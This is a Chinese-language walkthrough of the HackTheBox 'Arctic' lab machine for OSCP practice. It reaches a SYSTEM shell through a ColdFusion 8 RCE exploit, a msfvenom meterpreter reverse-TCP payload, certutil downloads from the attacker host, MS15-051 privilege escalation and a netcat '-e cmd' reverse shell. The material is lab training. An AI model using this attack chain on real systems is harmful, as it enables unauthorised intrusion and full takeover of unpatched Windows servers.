渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

admin 2022年10月18日17:50:53评论40 views字数 1929阅读6分25秒阅读模式

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Arctic

靶场: HackTheBox.com

靶机名称:Arctic

难度: 简单

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.3
 
 靶机:10.10.10.11

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo masscan -p1-65535 -i tun0 10.10.10.11 --max-rate 1000

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

 sudo nmap -sC -sV -p 135,49154,8500 10.10.10.11 -oN nmap.log

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

只扫到3个端口,未发现可利用的信息,来看看这个8500端口

漏洞利用(Exploitation)

telnet看看端口是否会返回信息

 telnet 10.10.10.11 8500

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

没有任何信息,试试HTTP访问

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

HTTP可以访问,发现两个目录,访问看看

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

目录下发现一些页面点击访问

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

Macromedia这不是2000左右最出名的网页三剑客公司吗,再找找

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

发现重点了“coldfusion 8”,来找找是否存在漏洞

 https://www.exploit-db.com/

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

选两个来试试,先来RCE

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

2009年的漏洞使用的python3脚本,下载exp

 wget https://www.exploit-db.com/download/50057

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

下载后修改下文件扩展名(不改也行看心情),与代码部分的反弹地址

 mv 50057 exp.py
 vim exp.py

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

执行exp

 py3 exp.py

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

拿到shell先找下flag

cd c:users
dir

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

发现两个用户

 cd tolis
 tree /f

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

桌面上发现user.txt

type desktopuser.txt

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

拿到第一个flag,继续收集信息


渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

发现是一台windows 2008 R2服务器没有打过任何补丁,用msfvemon生成个个后门,连接到msf中再来提权。

提权(Privilege Escalation)

1。生成后门

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f exe > shell.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

2。上传后门

攻击机开启HTTP服务

py3 -m http.server

靶机下载shell.exe

certutil -urlcache -split -f http://10.10.16.3:8000/shell.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

3。上线msf

攻击机开启msf并设置监听

 msfconsole
 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set LHOST 10.10.16.3
 run

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机执行shell.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

反弹成功,迁移进程(自动迁移一般情况都是迁移到Notepad.exe)

 run post/windows/manage/migrate

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

开始提权

 background
 search local_exploit
 show options
 set session 1
 run

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

提权失败,换Bastard靶机中的MS15-051来提权

 cp ../Bastard/MS15-051-KB3045171/ms15-051x64.exe .
 py3 -m http.server

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机下载exp

certutil -urlcache -split -f http://10.10.16.3:8000/ms15-051x64.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

上传成功,来验证下

ms15-051x64.exe whoami

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

验证成功,接下来可以通过使用ms15-051x64.exe这个exp来执行nc反弹shell到攻击机上达到直接控制目标机品的目地。

首先在攻击机上nc64.exe目录下开启HTTP服务并监听3333端口,然后靶机下载nc64.exe,再通过ms15-051x64.exe来执行nc反弹

开启HTTP服务

py3 -m http.server

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

监听3333端口

nc -lnvp 3333

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机下载nc64.exe

certutil -urlcache -split -f http://10.10.16.3:8000/nc64.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机执行反弹

ms15-051x64.exe "nc64.exe 10.10.16.3 3333 -e cmd"

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

反弹成功,拿到system权限,来找找flag

cd ../administrator

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

同样root.txt放在管理员桌面上

 type desktoproot.txt

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

拿到root.txt,游戏结束

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月18日17:50:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)https://cn-sec.com/archives/1356945.html

发表评论

匿名网友 填写信息